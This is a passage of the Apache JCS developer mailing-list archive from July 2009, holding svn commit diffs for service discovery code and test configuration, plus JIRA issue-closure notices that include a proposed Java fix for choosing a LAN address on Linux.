getDiscoveredServices() ) { - if ( log.isInfoEnabled() ) + // Since this is a set we can add it over an over. + // We want to replace the old one, since we may add info that is not part of the equals. + // The equals method on the object being added is intentionally restricted. + if ( !getDiscoveredServices().contains( discoveredService ) ) { - log.info( "Set does not contain service. I discovered " + discoveredService ); + if ( log.isInfoEnabled() ) + { + log.info( "Set does not contain service. I discovered " + discoveredService ); + } + if ( log.isDebugEnabled() ) + { + log.debug( "Adding service in the set " + discoveredService ); + } + getDiscoveredServices().add( discoveredService ); } - if ( log.isDebugEnabled() ) + else { - log.debug( "Adding service in the set " + discoveredService ); - } - getDiscoveredServices().add( discoveredService ); + if ( log.isDebugEnabled() ) + { + log.debug( "Set contains service." ); + } + if ( log.isDebugEnabled() ) + { + log.debug( "Updating service in the set " + discoveredService ); + } - // todo update some list of cachenames - Iterator it = getDiscoveryListeners().iterator(); - while ( it.hasNext() ) - { - ( (IDiscoveryListener) it.next() ).addDiscoveredService( discoveredService ); - } - } - else - { - if ( log.isDebugEnabled() ) - { - log.debug( "Set contains service." ); - } - if ( log.isDebugEnabled() ) - { - log.debug( "Updating service in the set " + discoveredService ); - } - Iterator it = getDiscoveredServices().iterator(); - // need to update the time this sucks. add has no effect convert to a map - while ( it.hasNext() ) - { - DiscoveredService service1 = (DiscoveredService) it.next(); - if ( discoveredService.equals( service1 ) ) + // Update the list of cache names if it has changed. + DiscoveredService theOldServiceInformation = null; + Iterator it = getDiscoveredServices().iterator(); + // need to update the time this sucks. add has no effect convert to a map + while ( it.hasNext() ) { - service1.setLastHearFromTime( discoveredService.getLastHearFromTime() ); - break; + DiscoveredService service1 = (DiscoveredService) it.next(); + if ( discoveredService.equals( service1 ) ) + { + theOldServiceInformation = service1; + break; + } } + if ( theOldServiceInformation != null ) + { + if ( !theOldServiceInformation.getCacheNames().equals( discoveredService.getCacheNames() ) ) + { + if ( log.isInfoEnabled() ) + { + log.info( "List of cache names changed for service: " + discoveredService ); + } + } + } + + // replace it, we want to reset the payload and the last heard from time. + getDiscoveredServices().remove( discoveredService ); + getDiscoveredServices().add( discoveredService ); } } + // Always Notify the listeners + // If we don't do this, then if a region using the default config is initialized after notification, + // it will never get the service in it's no wait list. + // Leave it to the listeners to decide what to do. + Iterator it = getDiscoveryListeners().iterator(); + while ( it.hasNext() ) + { + ( (IDiscoveryListener) it.next() ).addDiscoveredService( discoveredService ); + } + } /** Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java Thu Jul 23 18:27:41 2009 @@ -29,7 +29,7 @@ { /** * Add the service if needed. This does not necessarily mean that the service is not already - * added. This can be called if there is a change. + * added. This can be called if there is a change in service information, such as the cacheNames. * <p> * @param service the service to add */ Modified: jakarta/jcs/trunk/src/test-conf/TestTCPLateralRemoveFilter.ccf URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test-conf/TestTCPLateralRemoveFilter.ccf?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test-conf/TestTCPLateralRemoveFilter.ccf (original) +++ jakarta/jcs/trunk/src/test-conf/TestTCPLateralRemoveFilter.ccf Thu Jul 23 18:27:41 2009 @@ -37,36 +37,7 @@ jcs.auxiliary.LTCP=org.apache.jcs.auxiliary.lateral.socket.tcp.LateralTCPCacheFactory jcs.auxiliary.LTCP.attributes=org.apache.jcs.auxiliary.lateral.socket.tcp.TCPLateralCacheAttributes jcs.auxiliary.LTCP.attributes.TcpServers=localhost:1117 -jcs.auxiliary.LTCP.attributes.TcpListenerPort=1118 +jcs.auxiliary.LTCP.attributes.TcpListenerPort=2001 jcs.auxiliary.LTCP.attributes.AllowGet=false jcs.auxiliary.LTCP.attributes.IssueRemoveOnPut=true -jcs.auxiliary.LTCP.attributes.FilterRemoveByHashCode=true - -# ############################################################# -# ################# THREAD POOL CONFIGURATION ################### -# Default thread pool config -thread_pool.default.boundarySize=2000 -thread_pool.default.maximumPoolSize=150 -thread_pool.default.minimumPoolSize=4 -thread_pool.default.keepAliveTime=350000 -# RUN ABORT WAIT BLOCK DISCARDOLDEST -thread_pool.default.whenBlockedPolicy=RUN -thread_pool.default.startUpSize=4 - -# Default Cache Event Queue thread pool config, used by auxiliaries -thread_pool.cache_event_queue.useBoundary=false -# thread_pool.cache_event_queue.boundarySize=2000 -# thread_pool.cache_event_queue.maximumPoolSize=10 -thread_pool.cache_event_queue.minimumPoolSize=5 -thread_pool.cache_event_queue.keepAliveTime=3500 -# thread_pool.cache_event_queue.whenBlockedPolicy=RUN -thread_pool.cache_event_queue.startUpSize=5 - -# Remote cache client thread pool config -thread_pool.remote_cache_client.boundarySize=75 -thread_pool.remote_cache_client.maximumPoolSize=150 -thread_pool.remote_cache_client.minimumPoolSize=4 -thread_pool.remote_cache_client.keepAliveTime=350000 -thread_pool.remote_cache_client.whenBlockedPolicy=RUN -thread_pool.remote_cache_client.startUpSize=4 - +jcs.auxiliary.LTCP.attributes.FilterRemoveByHashCode=true \ No newline at end of file Modified: jakarta/jcs/trunk/src/test-conf/log4j.properties URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test-conf/log4j.properties?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test-conf/log4j.properties (original) +++ jakarta/jcs/trunk/src/test-conf/log4j.properties Thu Jul 23 18:27:41 2009 @@ -28,7 +28,7 @@ log4j.category.org.apache.jcs.auxiliary.lateral=INFO log4j.category.org.apache.jcs.utils.struct=INFO log4j.category.org.apache.jcs.utils.threadpool=INFO -log4j.category.org.apache.jcs.utils.discovery=DEBUG +log4j.category.org.apache.jcs.utils.discovery=INFO log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:13:47 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15857 invoked from network); 23 Jul 2009 19:13:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:13:46 -0000 Received: (qmail 83255 invoked by uid 500); 23 Jul 2009 18:56:01 -0000 Delivered-To: [email protected] Received: (qmail 83244 invoked by uid 500); 23 Jul 2009 18:56:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 83234 invoked by uid 500); 23 Jul 2009 18:56:01 -0000 Delivered-To: [email protected] Received: (qmail 83231 invoked by uid 500); 23 Jul 2009 18:56:01 -0000 Delivered-To: [email protected] Received: (qmail 83228 invoked by uid 99); 23 Jul 2009 18:56:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 18:56:01 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 18:55:58 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E2AE423888D1; Thu, 23 Jul 2009 18:55:38 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797188 - /jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/AbstractAuxiliaryCache.java Date: Thu, 23 Jul 2009 18:55:38 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 23 18:55:38 2009 New Revision: 797188 URL: http://svn.apache.org/viewvc?rev=797188&view=rev Log: formatting Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/AbstractAuxiliaryCache.java Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/AbstractAuxiliaryCache.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/AbstractAuxiliaryCache.java?rev=797188&r1=797187&r2=797188&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/AbstractAuxiliaryCache.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/AbstractAuxiliaryCache.java Thu Jul 23 18:55:38 2009 @@ -183,7 +183,7 @@ } /** - * Rerturns the key matcher used by get matching. + * Returns the key matcher used by get matching. * <p> * @return keyMatcher */ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:14:37 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20565 invoked from network); 23 Jul 2009 19:14:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:14:36 -0000 Received: (qmail 86800 invoked by uid 500); 23 Jul 2009 19:00:40 -0000 Delivered-To: [email protected] Received: (qmail 86749 invoked by uid 500); 23 Jul 2009 19:00:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 86738 invoked by uid 99); 23 Jul 2009 19:00:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:00:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:00:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A9787234C055 for <[email protected]>; Thu, 23 Jul 2009 12:00:15 -0700 (PDT) Message-ID: <1049384754.1248375615693.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:00:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-59) jcs auxiliary cache memcached In-Reply-To: <585256928.1245330307476.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-59?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-59. -------------------------- Resolution: Fixed This can't function as a remote aux. > jcs auxiliary cache memcached > ----------------------------- > > Key: JCS-59 > URL: https://issues.apache.org/jira/browse/JCS-59 > Project: JCS > Issue Type: New Feature > Reporter: Robert Fuller > Assignee: Aaron Smuts > Attachments: jcs-memcached.zip, memcached-0.0.1-SNAPSHOT.jar > > > Create an auxiliary cache which uses memcached -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:15:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23943 invoked from network); 23 Jul 2009 19:15:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:39 -0000 Received: (qmail 93687 invoked by uid 500); 23 Jul 2009 19:14:14 -0000 Delivered-To: [email protected] Received: (qmail 89115 invoked by uid 500); 23 Jul 2009 19:13:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 87615 invoked by uid 99); 23 Jul 2009 19:04:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:04:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:04:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E2E30234C04B for <[email protected]>; Thu, 23 Jul 2009 12:04:14 -0700 (PDT) Message-ID: <246542440.1248375854928.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:04:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-47) How to build an element key In-Reply-To: <1390820260.1216979851701.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-47?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-47. -------------------------- Resolution: Fixed > How to build an element key > --------------------------- > > Key: JCS-47 > URL: https://issues.apache.org/jira/browse/JCS-47 > Project: JCS > Issue Type: Question > Components: Documentation > Affects Versions: jcs-1.3 > Reporter: Ronny Roeller > Assignee: Aaron Smuts > > I use a string as key for my elements. Now I was surprised to get this error message: > 11:07:52,257 INFO [CacheEventQueue] Cache event queue created: CacheEventQueue [listenerId=1501085802, cacheName=cache] > 11:07:53,000 INFO [STDOUT] org.apache.jcs.access.exception.CacheException: key must not end with : for a put operation > I guess this means that colon is a special character, and can't be freely used as a key. > Unfortunately, I couldn't find any documentation on the project website what the constrains are for keys. It would also be interested to know if there is anything else to be considered when choosing the key, e.g. is there an advantage in using shorter keys? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:15:46 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24691 invoked from network); 23 Jul 2009 19:15:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:45 -0000 Received: (qmail 94036 invoked by uid 500); 23 Jul 2009 19:14:15 -0000 Delivered-To: [email protected] Received: (qmail 89751 invoked by uid 500); 23 Jul 2009 19:13:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 87541 invoked by uid 99); 23 Jul 2009 19:02:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:02:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:02:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CA052234C004 for <[email protected]>; Thu, 23 Jul 2009 12:02:14 -0700 (PDT) Message-ID: <681659931.1248375734812.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:02:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-30) Log error CompositeCache.get In-Reply-To: <1074779.1187051250613.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-30?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-30. -------------------------- Resolution: Cannot Reproduce > Log error CompositeCache.get > ---------------------------- > > Key: JCS-30 > URL: https://issues.apache.org/jira/browse/JCS-30 > Project: JCS > Issue Type: Bug > Components: Composite Cache > Affects Versions: jcs-1.3 > Environment: Resin on linux > Reporter: Akash > Assignee: Aaron Smuts > > hi > we JCS in production,and we are periodically seeing this error. > "ERROR - "Problem encountered getting element." - resin-tcp-connection-*:8080-31 CompositeCache.get:579" . > * we are not able to reproduce this locally. > *Not sure in what circumstances this error is caused -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:15:50 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25390 invoked from network); 23 Jul 2009 19:15:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:49 -0000 Received: (qmail 94541 invoked by uid 500); 23 Jul 2009 19:14:16 -0000 Delivered-To: [email protected] Received: (qmail 89932 invoked by uid 500); 23 Jul 2009 19:13:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 87540 invoked by uid 99); 23 Jul 2009 19:02:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:02:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:02:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E6738234C04B for <[email protected]>; Thu, 23 Jul 2009 12:02:14 -0700 (PDT) Message-ID: <738975399.1248375734943.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:02:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-35) JCS.setConfigFilename() not documented properly In-Reply-To: <10821721.1197632623217.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-35?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-35. -------------------------- Resolution: Fixed > JCS.setConfigFilename() not documented properly > ----------------------------------------------- > > Key: JCS-35 > URL: https://issues.apache.org/jira/browse/JCS-35 > Project: JCS > Issue Type: Bug > Components: Composite Cache > Affects Versions: jcs-1.3 > Reporter: Graham Leggett > Assignee: Aaron Smuts > > If an attempt is made to use the JCS.setConfigFilename() method to set the location of the cache.ccf file, this results in the vague error: "Failed to load properties for name". > Looking in the source, the config file is loaded relative to the class org/apache/jcs/engine/control/CompositeCacheManager.java, though no explanation is given for why this object was chosen for the config file to be relative to, nor do the javadocs for setConfigFilename() offer any explanation as to the real config file behaviour. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:08 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26644 invoked from network); 23 Jul 2009 19:15:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:57 -0000 Received: (qmail 2282 invoked by uid 500); 23 Jul 2009 19:14:37 -0000 Delivered-To: [email protected] Received: (qmail 2262 invoked by uid 500); 23 Jul 2009 19:14:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 2235 invoked by uid 99); 23 Jul 2009 19:14:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2EC55234C1E7 for <[email protected]>; Thu, 23 Jul 2009 12:14:15 -0700 (PDT) Message-ID: <1462232969.1248376455190.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:14:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-40) InetAddress.getLocalHost() ambiguous on Linux systems In-Reply-To: <1066089445.1204637680849.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-40?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-40. -------------------------- > InetAddress.getLocalHost() ambiguous on Linux systems > ----------------------------------------------------- > > Key: JCS-40 > URL: https://issues.apache.org/jira/browse/JCS-40 > Project: JCS > Issue Type: Bug > Affects Versions: jcs-1.3 > Environment: Linux and other *nix systems > Reporter: Niall Gallagher > Assignee: Aaron Smuts > Original Estimate: 1h > Remaining Estimate: 1h > > Per JDK bug http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=4665037 > ...InetAddress.getLocalHost() is ambiguous on Linux systems. JCS uses this method. We have found that the issue breaks JCS networking on Linux/*nix systems (tested on Fedora, Red Hat and CentOS) configured with both static and DHCP-assigned IP addresses. The only workarounds we can find either do not 100% fix the problem, or require non-optimal configuration of the OS loopback connection. > Background: > On Windows the address returned by InetAddress.getLocalHost() is fairly consistent; typically the server's LAN address. On Windows systems with multiple network cards (e.g. Internet, WAN, LAN, VPN, multi-homed), the address returned is ambiguous however. > On Linux, the address returned by InetAddress.getLocalHost() seems to depend on the order in which the OS lists network interfaces, which really should be irrelevant. Furthermore the behaviour can vary between Linux distributions. Linux always exposes the loopback address (161.129.204.104) as a virtual network card, as if it was a physical NIC. On servers using DHCP, the method usually returns the loopback address. On servers configured with static IP addresses, depending on OS ordering, the method sometimes returns the LAN address but sometimes returns the loopback (161.129.204.104) address. > InetAddress.getLocalHost() makes no attempt to prioritize LAN/non-loopback addresses in its selection. > Impact on JCS: > This affects networking in JCS in general. e.g. remote cache and lateral cache. JCS can bind to the loopback interface (161.129.204.104) instead of the LAN address, or the RMI system can advertise the wrong (161.129.204.104) IP address to clients when sending events. We use the JCS remote cache server, and saw both of these issues on Fedora, Red Hat and CentOS machines configured with static and DHCP-assigned addresses. > We first tried various workarounds: > -setting system property java.rmi.server.hostname=x.x.x.x > --> JCS overrides this by supplying an invalid (161.129.204.104) IP address to the RMI subsystem explicitly > -changing the IP address associated with localhost in /etc/hosts file from 161.129.204.104 to the machines LAN address > -->reduces the performance of inter-process (loopback) communication on the server > In the end we modified the JCS source code, and we have been running it flawlessly for the past 8 months. The fix requires JDK 1.4. Can we therefore get it integrated into the next 1.4 release of JCS? > JCS uses InetAddress.getLocalHost() in the following classes: > org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryService.java > org/apache/jcs/auxiliary/remote/server/RemoteCacheStartupServlet.java > org/apache/jcs/utils/net/HostNameUtil.java > We updated UDPDiscoveryService and RemoteCacheStartupServlet to not call InetAddress.getLocalHost() directly, but to call the getLocalHostAddress() method in HostNameUtil instead. > We then changed the implementation of HostNameUtil.getLocalHostAddress() as follows: > public static String getLocalHostAddress() throws UnknownHostException { > return getLocalHostLANAddress().getHostAddress(); > } > /** > * Returns an <code>InetAddress</code> object encapsulating what is most likely the machine's LAN IP address. > * <p/> > * This method is intended for use as a replacement of JDK method <code>InetAddress.getLocalHost</code>, because > * that method is ambiguous on Linux systems. Linux systems enumerate the loopback network interface the same > * way as regular LAN network interfaces, but the JDK <code>InetAddress.getLocalHost</code> method does not > * specify the algorithm used to select the address returned under such circumstances, and will often return the > * loopback address, which is not valid for network communication. Details > * <a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=4665037">here</a>. > * <p/> > * This method will scan all IP addresses on all network interfaces on the host machine to determine the IP address > * most likely to be the machine's LAN address. If the machine has multiple IP addresses, this method will prefer > * a site-local IP address (e.g. 192.168.x.x or 10.10.x.x, usually IPv4) if the machine has one (and will return the > * first site-local address if the machine has more than one), but if the machine does not hold a site-local > * address, this method will return simply the first non-loopback address found (IPv4 or IPv6). > * <p/> > * If this method cannot find a non-loopback address using this selection algorithm, it will fall back to > * calling and returning the result of JDK method <code>InetAddress.getLocalHost</code>. > * <p/> > * > * @throws UnknownHostException If the LAN address of the machine cannot be found. > */ > private static InetAddress getLocalHostLANAddress() throws UnknownHostException { > try { > InetAddress candidateAddress = null; > // Iterate all NICs (network interface cards)... > for (Enumeration ifaces = NetworkInterface.getNetworkInterfaces(); ifaces.hasMoreElements();) { > NetworkInterface iface = (NetworkInterface) ifaces.nextElement(); > // Iterate all IP addresses assigned to each card... > for (Enumeration inetAddrs = iface.getInetAddresses(); inetAddrs.hasMoreElements();) { > InetAddress inetAddr = (InetAddress) inetAddrs.nextElement(); > if (!inetAddr.isLoopbackAddress()) { > if (inetAddr.isSiteLocalAddress()) { > // Found non-loopback site-local address. Return it immediately... > return inetAddr; > } > else if (candidateAddress == null) { > // Found non-loopback address, but not necessarily site-local. > // Store it as a candidate to be returned if site-local address is not subsequently found... > candidateAddress = inetAddr; > // Note that we don't repeatedly assign non-loopback non-site-local addresses as candidates, > // only the first. For subsequent iterations, candidate will be non-null. > } > } > } > } > if (candidateAddress != null) { > // We did not find a site-local address, but we found some other non-loopback address. > // Server might have a non-site-local address assigned to its NIC (or it might be running > // IPv6 which deprecates the "site-local" concept). > // Return this non-loopback candidate address... > return candidateAddress; > } > // At this point, we did not find a non-loopback address. > // Fall back to returning whatever InetAddress.getLocalHost() returns... > InetAddress jdkSuppliedAddress = InetAddress.getLocalHost(); > if (jdkSuppliedAddress == null) { > throw new UnknownHostException("The JDK InetAddress.getLocalHost() method unexpectedly returned null."); > } > return jdkSuppliedAddress; > } > catch (Exception e) { > UnknownHostException unknownHostException = new UnknownHostException("Failed to determine LAN address: " + e); > unknownHostException.initCause(e); > throw unknownHostException; > } > } -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:08 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26662 invoked from network); 23 Jul 2009 19:15:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:57 -0000 Received: (qmail 3178 invoked by uid 500); 23 Jul 2009 19:14:39 -0000 Delivered-To: [email protected] Received: (qmail 3155 invoked by uid 500); 23 Jul 2009 19:14:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 3133 invoked by uid 99); 23 Jul 2009 19:14:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:36 